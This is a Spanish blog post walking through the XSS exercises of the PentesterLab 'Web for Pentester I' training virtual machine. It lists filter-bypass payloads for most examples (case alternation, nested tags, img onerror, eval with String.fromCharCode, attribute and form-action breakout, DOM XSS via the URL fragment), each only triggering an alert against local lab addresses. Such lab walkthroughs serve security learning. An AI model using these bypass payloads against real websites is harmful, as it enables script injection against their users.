Hoy, vamos a completar el primer post (ya hace más de un año) que hice. No pondré ningún enlace porque empezaré desde el principio.
Web for pentester I es una máquina virtual, perteneciente a pentesterlab, que nos ayuda a aprender seguridad en web. Tiene distintos ejemplos, XSS, Inyección SQL, etc. En el post de hoy, resolveremos los ejemplos de XSS.
Os la podréis descargar de https://pentesterlab.com/exercises/web_for_pentester
Ejemplo 1
Ejemplo 2
Aquí, la idea es cambiar las palabras script alternando mayúsculas y minúsculas para saltarnos el filtro. Da igual dónde las pongáis.
http://192.168.1.134/xss/example2.php?name=<scRipT>alert(“hola”)</SCrIpt>
Ejemplo 3
http://192.168.1.134/xss/example3.php?name=<sc<script>ript>alert("hola")</scri</script>pt>
Ejemplo 4
http://192.168.1.134/xss/example4.php?name=<img
src="fsociety" onerror=alert("hola")>
Ejemplo 5
fromCharCode, que pertenece a String,
convierte en cadena códigos decimales.
Le antepondremos eval para evaluar
Yo usaré la página
https://www.branah.com/ascii-converter
http://192.168.1.134/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,104,111,108,97,34,41))</script>
Primero convertimos en cadena los
códigos en decimal y después evaluamos el resultado.
Ejemplo 6
http://192.168.1.130/xss/example6.php?name=hacker";alert("hola");"
Ejemplo 7
Ejemplo 8
http://192.168.1.130/xss/example8.php/"><script>alert("hola")</script>
Aquí, estamos inyectando en la parte
del código
<form action="/xss/example8.php" method="POST">
para que quede
<form action="/xss/example8.php/"><script>alert(“hola”)</script> method="POST">
Ejemplo 9
http://192.168.1.130/xss/example9.php#hacker<script>alert("hola")</script>
Ojito, no funciona con algunos
navegadores, por ejemplo, en firefox no sale y en edge sí.
La idea es que poner el payload tras el
símbolo de # (anclaje). Es de tipo XSS-DOM (Modelo de objetos del
documento)
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.